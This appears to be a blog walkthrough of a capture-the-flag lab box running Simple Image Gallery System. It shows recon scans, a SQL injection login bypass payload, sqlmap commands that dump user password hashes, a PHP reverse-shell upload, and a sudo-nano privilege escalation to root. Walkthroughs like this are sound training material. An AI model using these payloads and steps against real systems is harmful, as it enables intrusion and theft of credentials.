We first begin by performing an nmap scan to determine what ports are open and what services are running behind them.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
➜ nmap -sC -sV -p- -T4 10.10.148.197
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-14 16:17 EST
Stats: 0:08:55 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 79.42% done; ETC: 16:29 (0:02:18 remaining)
Nmap scan report for 10.10.148.197 (10.10.148.197)
Host is up (0.19s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
8080/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-title: Simple Image Gallery System
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 745.02 seconds
Looking at the webpage on port 80, we get the default apache it works page…
With some fuzzing, we get a directory called gallery
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
➜ ./ffuf -w /usr/share/wordlists/dirb/common.txt -u http://10.10.148.197/FUZZ -e html,txt,php
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.10.148.197/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/common.txt
:: Extensions : html txt php
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
[Status: 200, Size: 10918, Words: 3499, Lines: 376]
.hta [Status: 403, Size: 278, Words: 20, Lines: 10]
.htahtml [Status: 403, Size: 278, Words: 20, Lines: 10]
.htaphp [Status: 403, Size: 278, Words: 20, Lines: 10]
.htaccess [Status: 403, Size: 278, Words: 20, Lines: 10]
.htatxt [Status: 403, Size: 278, Words: 20, Lines: 10]
.htaccesshtml [Status: 403, Size: 278, Words: 20, Lines: 10]
.htaccessphp [Status: 403, Size: 278, Words: 20, Lines: 10]
.htpasswd [Status: 403, Size: 278, Words: 20, Lines: 10]
.htpasswdtxt [Status: 403, Size: 278, Words: 20, Lines: 10]
.htpasswdphp [Status: 403, Size: 278, Words: 20, Lines: 10]
.htaccesstxt [Status: 403, Size: 278, Words: 20, Lines: 10]
.htpasswdhtml [Status: 403, Size: 278, Words: 20, Lines: 10]
gallery [Status: 301, Size: 316, Words: 20, Lines: 10]
index.html [Status: 200, Size: 10918, Words: 3499, Lines: 376]
server-status [Status: 403, Size: 278, Words: 20, Lines: 10]
:: Progress: [18456/18456] :: Job [1/1] :: 200 req/sec :: Duration: [0:01:41] :: Errors: 0 ::
looks like a CMS. Inspecting the page source, we can get an idea of the CMS running. Port 8080 is just a replica of 80
Its running Simple Image Gallery System…Well never heard of it before but lets see if we got any known vulnerabilities targeting it.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
➜ searchsploit Simple Image Gallery system
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Simple Image Gallery System 1.0 - 'id' SQL Injection | php/webapps/50198.txt
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
➜ searchsploit -m 50198.txt
Exploit: Simple Image Gallery System 1.0 - 'id' SQL Injection
URL: https://www.exploit-db.com/exploits/50198
Path: /usr/share/exploitdb/exploits/php/webapps/50198.txt
File Type: ASCII text
Copied to: /home/kali/Desktop/gallery/50198.txt
Looks like we have potential SQL Injection on the id parameter.
You can still get the same info on exploitDb.
Lets actually follow the steps listed on the POC.
Step 1:
WE need to first login, but we dont have any creds…trying some defaults, i didn’t get a hit. Tried some basic sqli bypass payloads from pentesterlab and got authenticated successfully.
'or 1=1 -- -
You can use any of this without supplying the password.
Step 2:
We’re supposed to Click on the Albums page and select an album if created or create by clicking on “Add New” on the top right and select the album.
Step 3:
Click on an image and capture the request in burpsuite.
Now copy the request and save it as test.req .
Step 4:
Run the sqlmap command sqlmap -r test.req --dbs
Awesome…So we now have two databases..Lets take this a step further and get tables on gallery_db
We can do so by running: sqlmap -r test.req --current-db gallery_db --tables
The users table sounds interesting. Run the following command to dump its contents:
sqlmap -r test.req --current-db gallery_db -T users --columns
password & username columns might be of great value. Dump the contents by running:
sqlmap -r test.req --current-db gallery_db -T users -C username,password --dump
We got the admin hash
a228b12a08b6527e7978cbe5d914531c
Back in our CMS, we are lucky to have the upload feature. I abused the functionality by uploading a php reverse shell and starting a nc listener to listen for incoming connections. Clicking on our shell script, we get a shell back
Once we get a shell, we can stabilize it and begin enumerating.
In the var directory, there is a backups folder which contains mike’s home backup. Digging the history, we get his password.
Documents dir had some credentials as well which aren’t necessary to complete this room.
Authenticating as Mike, we are now able to read the user flag.
Commands mike is allowed to run as root is /bin/bash /opt/rootkit.sh. But lets look at this script.
It looks like its running rkhunter.
rkhunter - RootKit Hunter is a shell script which carries out various checks on the local system to try and detect known rootkits and malware. It also performs checks to see if commands have been modified, if the system startup files have been modified, and various checks on the network interfaces, including checks for listening applications.
--versioncheck- This command option causes rkhunter to check if there is a later version of the program.--update- This command option causes rkhunter to check if there is a later version of any of its text data files.--list- This command option will list some of the supported capabilities of the program, and then exit.
Source : rkhunter(8) - Linux man page
We also have a last option which is nano. it seems to be reading a report file from /root’s directory. We can use GTFObins to see how we can exploit nano.
From the above, we simply need to:
1.Run the script and type read option.
1
2
mike@gallery:~$ sudo /bin/bash /opt/rootkit.sh
Would you like to versioncheck, update, list or read the report ? read
2.This should spawn nano. ctrl+x followed by ctrl+x and hit enter. You should get a prompt to add commands to execute.
3.Enter the command above and you should have a shell as root
Things brings me to the end of the blog. Glad you got help if you’re stuck. Until next time. Take care and keep safe.
rkhunter, nano, sqlmap, sqlinjection, searchsploit, CMS, wfuzz